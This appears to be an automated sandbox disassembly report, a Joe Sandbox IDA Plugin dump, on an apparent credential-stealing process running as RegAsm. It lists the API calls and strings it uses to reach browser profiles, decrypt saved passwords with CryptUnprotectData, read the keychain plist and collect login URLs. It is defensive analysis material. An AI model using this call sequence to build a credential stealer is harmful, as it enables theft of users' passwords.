                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                • API String ID: 2334598624-3798722523
                                                                                                                                                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                • API String ID: 1442760552-28296030
                                                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                • String ID: chp$v10
                                                                                                                                                                                • API String ID: 229402216-2783969131

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                • String ID: bhv
                                                                                                                                                                                • API String ID: 4234240956-2689659898

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                                • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                                • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                                • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                                • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                                • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                                • exit.MSVCRT ref: 00446897
                                                                                                                                                                                • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2791496988-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                • String ID: visited:
                                                                                                                                                                                • API String ID: 2470578098-1702587658

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 646 40e283-40e286 640->646 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 646->648 649 40e288-40e290 free 646->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                • API String ID: 2804212203-2982631422

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 115830560-3916222277

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                • API String ID: 2791114272-628097481

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                • API String ID: 2936932814-4196376884

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                • API String ID: 4039892925-11920434

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
